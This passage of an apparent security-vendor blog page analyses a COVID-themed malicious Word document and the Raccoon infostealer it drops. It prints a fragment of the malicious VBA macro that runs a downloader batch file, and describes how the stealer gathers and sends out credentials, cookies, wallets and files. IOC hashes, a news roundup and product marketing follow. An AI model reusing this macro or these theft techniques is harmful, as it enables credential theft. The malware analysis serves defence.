VBA Module 3 runs the batch file “easy.cmd”.

Attribute VB_Name = “Module3”
Public Const GENERIC_WRITE = &H40000000
Public Const OPEN_ALWAYS = 4
Public Const FILE_ATTRIBUTE_NORMAL = &H80#If VBA7 ThenPublic Declare PtrSafe Function WriteFile Lib “kernel32 ” ( _
ByVal hFile As LongPtr, _
lpBuffer As Any, _
ByVal nNumberOfBytesToWrite As LongPtr, _
lpNumberOfBytesWritten As LongPtr, _
ByVal lpOverlapped As LongPtr) As LongPtrPublic Declare PtrSafe Function MakeSureDirectoryPathExists Lib _
“IMAGEHLP.DLL ” (ByVal DirPath As String) As LongPtrPublic Declare PtrSafe Function CreateFile Lib “kernel32 ” Alias “CreateFileA” ( _
ByVal lpFileName As String, _
ByVal dwDesiredAccess As LongPtr, _
ByVal dwShareMode As LongPtr, _
ByVal lpSecurityAttributes As LongPtr, _
ByVal dwCreationDisposition As LongPtr, _
ByVal dwFlagsAndAttributes As LongPtr, _
ByVal hTemplateFile As LongPtr) As LongPtrPublic Declare PtrSafe Function CloseHandle Lib “kernel32 ” (ByVal hObject As LongPtr) As LongPtr
#Else
Public Declare Function WriteFile Lib “kernel32 ” ( _
ByVal hFile As Long, _
lpBuffer As Any, _
ByVal nNumberOfBytesToWrite As Long, _
lpNumberOfBytesWritten As Long, _
ByVal lpOverlapped As Long) As LongPublic Declare Function MakeSureDirectoryPathExists Lib _
“IMAGEHLP.DLL ” (ByVal DirPath As String) As LongPublic Declare Function CreateFile Lib “kernel32 ” Alias “CreateFileA” ( _
ByVal lpFileName As String, _
ByVal dwDesiredAccess As Long, _
ByVal dwShareMode As Long, _
ByVal lpSecurityAttributes As Long, _
ByVal dwCreationDisposition As Long, _
ByVal dwFlagsAndAttributes As Long, _
ByVal hTemplateFile As Long) As LongPublic Declare Function CloseHandle Lib “kernel32 ” (ByVal hObject As Long) As Long
obj3.Run “c:\NTcore\easy.cmd”, 0

The batch file “easy.cmd”  generates VB script called MMC.vbs. Later runs the same script to download the malicious payload ‘ppdls.exe’ from the path “hxxp://taterbugfarm.com/license.exe”.

Raccoon Infostealer

The main payload ‘ppdls.exe’ is a raccoon info stealer malware, packed with Borland Delphi. This variant does include anti-debugging tricks by checking for timer ticks but no anti-VM protections included in it.

Once the payload gets executed on the target machine, it unpacks itself in memory and performs a GET request to the Google drive to retrieve the C&C domain.

The malware then creates a machine profile and sends the base64 encoded string to the C&C with a POST request.

The decoded machine profile is given below.

bot_id=C744ACBE-D01A-4C98-9752-3C9954793166_g3 &
config_id=d09962d7f04c2e0bdd09e58c69dd3e16a78f4630 &
data=null

The C&C server then returns a Json that contains the configuration for the raccoon stealer to perform it’s tasks.

Raccoon targets a wide range of applications and it requires specific libraries for each application to extract and decrypt the credentials. Those dependencies are specified as URLs. The malware then downloads those dll’s and loads them. 

Loader_urls is not enabled here, so it is not used as dropper agent for downloading the next stage malware payloads.

It looks into the victim’s desktop and recent data for keywords specified in the mask field, such as international bank account (iba), 
account, cvv, cvc, credentials, passwords, and even cryptocurrency wallets, such as ethereum and bitcoin. It also extracts recent files with the extension .pdf, .txt,.rtf .doc.

All the stolen files are then archived and posted to the C&C server as “data.zip”. 

The browser directory contains the extracted cookies, credentials, auto-fills and urls. The files directory contains the files with the specified extensions from the recent folder and also the files with any of the masked keywords in it. As is_screen_enabled is set to 1, a snapshot of the victim machine is also attached.

The “System Info.txt” has the following information about the victim’s machine. Raccon stealer version is marked as 1.5 and the build is created on Aril 13th 2020.
[Raccoon Stealer] – v1.5 Release
Build compiled on Mon Apr 13 12:44:18 2020
Launched at: 2020.05.03 – 04:05:39 GMT
Bot_ID: C744ACBE-D01A-4C98-9752-3C9954793166_gaya3
Running on a desktop
=R=A=C=C=O=O=N=
System Information:
– System Language: English
– System TimeZone: -8 hrs
– IP: X.X.X.X
– Location: XXXXXX
– ComputerName: G3
– Username: G3
– Windows version: NT 6.1
– Product name: Windows 7 Enterprise
– System arch: x64
– CPU: Intel(R) Core(TM) i7-7700 CPU @ 3.60GHz (1 cores)
– RAM: 2047 MB (1285 MB used)
– Screen resolution: 2560×1251
– Display devices:
0) VirtualBox Graphics Adapter
============

Raccoon targets the following browser applications as references to the following ones are found in the unpacked malware.

  • Google Chrome
  • Chromium
  • Xpom
  • Comodo
  • Amigo
  • Orbitum
  • Bromium
  • Nichrome
  • Rockmelt
  • 360Browser
  • Nichrome
  • Vivaldi
  • Opera
  • Go
  • Sputnik
  • Kometa
  • Uran
  • QIP Surf
  • Epic Privacy
  • CocCoc
  • CentBrowser
  • 7Star
  • Elements
  • TorBro
  • Suhba
  • Safer Browser
  • Mustang
  • Superbird
  • Chedot
  • Torch
  • QQ Browser
  • UC BRowser

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

GAV: Covid.VBA (Trojan)
GAV: Delphi.D (Trojan)

IOC:

b8288b1a13468b71c45ba7363fbce67a9e89007d7d098910c7f63487570899af (Email)

2ec963133cf483fcbc8a6238cfac34b5390fb2a8fcec9862cc7af6cf8f79a326 (Zip)

fada93ab8496af86f141ba0670da43f388dc60483c89c795ed98ccef842400ea (Doc)

59d85aece56f4c9f4b5927a0d18d83e9c1f62477c8941dd2b5bc6c9aad01ee2e (Raccoon)

4cfada7eb51a6c0cb26283f9c86784b2b2587c59c46a5d3dc0f06cad2c55ee97 (Libs.zip)

89c049e8c3e9f0f817c8d267654f91d0a4b63635d2bfa8463ba3138e7a290dd4 (unpacked Raccoon)

This threat is also detected by SonicWALL Capture ATP w/RTDMI

Cybersecurity News & Trends – 05-01-20

/0 Comments/in /by

This week, COVID-19 continued to be a boon for opportunistic hackers, who targeted everything from federal stimulus funds, to package recipients, to John Wick 3.

SonicWall Spotlight

Cutting Business Expenses Shouldn’t Include Cybersecurity – Channel Futures

  • HoJin Kim explains how Boundless Cybersecurity’s emphasis on scalable economics is helping companies secure their networks during the current economic downturn.

Social Distancing For IoT—No, You Aren’t Paranoid When You Say It! – PC Quest

  • Debasish Mukherjee, VP of regional sales APAC at SonicWall, discusses how the world of cybersecurity compares to the race to find a cure for the novel coronavirus.

COVID-19 Impact: Health and Wellbeing of Employees Have Taken Precedence – Arabian Reseller

  • Mohamad Abdallah, regional director for META, speaks about how COVID-19 has impacted business at SonicWall and the contingency plans the company has put into place in case the crisis persists or continues to worsen.

Cybersecurity News

Scammers pounce as stimulus checks start flowing – The Hill

  • The ongoing taxpayer stimulus is increasingly being targeted by scammers, who see the funds as easy pickings during the ongoing crisis.

FCC Only Partially Improved Its Cybersecurity Posture, GAO Says – Security Week

  • The Federal Communications Commission (FCC) has yet to fully address security weaknesses in its systems, a newly published report from the United States Government Accountability Office (GAO) reveals.

Shade Ransomware shuts down, releases 750K decryption keys – Bleeping Computer

  • The operators behind the Shade Ransomware (Troldesh) have shut down their operations, released over 750,000 decryption keys, and apologized for the harm they caused their victims.

Hackers spoof SBA to try to compromise companies’ computers – Cyberscoop

  • It isn’t just the taxpayer stimulus being targeted by bad actors—the funds distributed by the U.S. Small Business Administration to companies affected by COVID-19 are also in their crosshairs.

The Covid-19 Pandemic Reveals Ransomware’s Long Game – Wired

  • Hackers laid the groundwork months ago for attacks. Now they’re flipping the game.

Lucy malware for Android adds file-encryption for ransomware ops – Bleeping Computer

  • A threat actor focusing on Android systems has expanded their malware-as-a-service (MaaS) business with file-encrypting capabilities for ransomware operations.

COVID-19’s impact on package deliveries creates golden opportunity for scammers  – SC Magazine

  • Cybercriminals are using the disruption caused by COVID-19 to pose as delivery companies, as they attempt to swindle businesses into opening malicious emails or handing over their credentials.

Microsoft warns of malware-laced ‘John Wick 3,’ ‘Contagion’ movie torrents – Cyberscoop

  • Tens of thousands of internet users have been infected with malware as they attempt to torrent popular movies and wind up downloading more than they intended.

In Case You Missed It

Why Securing Remote Work is Crucial To Ensuring Business Continuity

/0 Comments/in /by

If you had asked them in January, most organizations would probably have said things were humming along smoothly. Economic growth was strong, and in most cases budgets and security plans were being created and carried out without any need or intention to disrupt the status quo.

Then the entire world changed.

Within the space of a couple weeks, bustling offices were deserted one by one as federal, state, provincial and local governments issued stay-at-home and shelter-in-place orders, and employees boxed up their essential belongings and became part of the rapidly expanding global remote workforce.

While these moves were necessary to stem the spread of COVID-19, the disruption that this sudden change brought with it introduced a set of problems most businesses were ill-equipped to manage.

Companies that previously felt confident in their cybersecurity strategy suddenly found that they didn’t have the capacity or licenses to secure a full-scale mobile workforce. Worse, they needed to manage employees ill-prepared for the transition, many of whom didn’t understand the additional precautions required for safe remote work.

For hackers, though, these are the salad days — and the combination of inexperienced employees and unprepared businesses has brought them out in force. According to Reuters, hacking activity targeting corporations in the U.S. and elsewhere more than doubled in March, and preliminary reports show much the same for April. These threats highlight the urgent need for scalable Secure Remote Access and VPN license capacity to handle the new influx of remote employees while offering the same level of security offered on-prem.

Greater capacity for increased security

To help small- and medium-sized businesses (SMB) handle a rapidly expanding remote workforce, SonicWall has improved the scalability of its SMA 210 and 410 appliances — the 210 can now manage up to 200 remote VPN users, and the 410 can now support 400.

Many enterprises, governments and MSSPs are facing issues with scalability, too. To handle the influx of remote users on large distributed networks, the SonicWall SMA 1000 series allows these organizations to scale up to a million remote VPN users.

To scope which SMA solution is right for your organization, review the SonicWall Secure Mobile Access data sheet.

New public cloud options for the ‘new business normal’

The remote-work revolution coincides with another major shift in how enterprises work — the ongoing cloud transformation. The benefits of moving to a public cloud are myriad — including cost savings, greater agility, maximum uptime and quick and easy deployment.

While SonicWall has long supported private clouds, such as VMware ESXi and Microsoft Hyper-V, SonicWall SMA 500v and SMA 8200v virtual appliances can now be launched on AWS or Microsoft Azure, allowing businesses to realize these benefits at a time when they may need them the most.

Protect remote workers with special offers on SMA, VPN

Right now, budget concerns are at the forefront for many businesses. To help both new and existing customers implement necessary security during this time of crisis, SonicWall has launched several new ‘Work From Home Securely’ promotions to ensure organizations can implement comprehensive security in a cost-effective way.

With SonicWall’s new Work From Home Securely special offers on SMA and other solutions, there’s never been a better time — or a more crucial time — to secure your remote workforce.